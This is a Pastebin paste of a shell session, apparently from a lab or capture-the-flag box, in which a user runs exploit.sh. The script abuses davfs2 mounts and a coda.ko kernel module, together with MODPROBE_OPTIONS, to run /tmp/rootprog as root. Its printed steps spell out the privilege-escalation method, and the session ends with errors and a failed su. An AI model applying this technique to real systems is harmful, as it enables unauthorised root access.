Advertisement
Guest User

Untitled

a guest
Feb 3rd, 2016
1,726
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.98 KB | None | 0 0
  1. davtest@humble:/tmp$ cat /etc/fstab | grep dav*
  2. cat /etc/fstab | grep dav*
  3. # / was on /dev/sda1 during installation
  4. # swap was on /dev/sda5 during installation
  5. http://127.0.0.1/webdav/ /home/davtest/dav davfs noauto,rw,users 0 0
  6. davtest@humble:/tmp$ ./exploit.sh
  7. ./exploit.sh
  8. #######################################
  9. Specify the full path of the kernel module which you want to load
  10. Leave empty if you wish to compile it now
  11. Understand that you need kernel headers, make and gcc for successful compilation
  12. #######################################
  13.  
  14.  
  15. make: Warning: File `Makefile' has modification time 3.2e+04 s in the future
  16. make: Nothing to be done for `all'.
  17. make: warning: Clock skew detected. Your build may be incomplete.
  18. #######################################
  19. Copying the modules in use for the running kernel in the local directory
  20. #######################################
  21. #######################################
  22. Copying coda.ko module
  23. #######################################
  24. cp: cannot stat `/tmp/coda.ko': No such file or directory
  25. #######################################
  26. Setting the 'modules.dep' and running depmod
  27. #######################################
  28. #######################################
  29. Specify the user-mode ELF which you whish to copy in /tmp/rootprog that will be run as root. Default value is /tmp/rootprog
  30. WARNING !!!!!!!! YOU HAVE ONLY 1 SHOT !!!!! unmounting webdav partitions doesn't unload the coda.ko module
  31. #######################################
  32.  
  33.  
  34. cp: `/tmp/rootprog' and `/tmp/rootprog' are the same file
  35. #######################################
  36. Setting MODPROBE_OPTIONS variable
  37. #######################################
  38. #######################################
  39. Now, check the the /home/davtest/.davfs2/davfs.conf. Modify the default value of 'kernel_fs' to coda eg:
  40. # General Options
  41. # ---------------
  42.  
  43. # dav_user davfs2 # system wide config file only
  44. # dav_group davfs2 # system wide config file only
  45. # ignore_home # system wide config file only
  46. kernel_fs coda
  47. # buf_size 16 # KiByte
  48. #######################################
  49. #######################################
  50. Then, check /etc/fstab for remote webdav servers which the user can mount, eg:
  51. https://www.crushftp.com/demo/ /home/foo/dav davfs noauto,user 0 0
  52. #######################################
  53. #######################################
  54. If the remote webdav is authenticated, ensure to have valid credentials. The run 'mount /home/foo/dav' inside this terminal'
  55. #######################################
  56. davtest@humble:/tmp$ mount /home/davtest/dav
  57. mount /home/davtest/dav
  58. Please enter the username to authenticate with server
  59. http://127.0.0.1/webdav/ or hit enter for none.
  60. Username: test
  61. test
  62. Please enter the password to authenticate user test with server
  63. http://127.0.0.1/webdav/ or hit enter for none.
  64. Password: test
  65.  
  66. davtest@humble:/tmp$ su bart
  67. su bart
  68. No passwd entry for user 'bart'
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement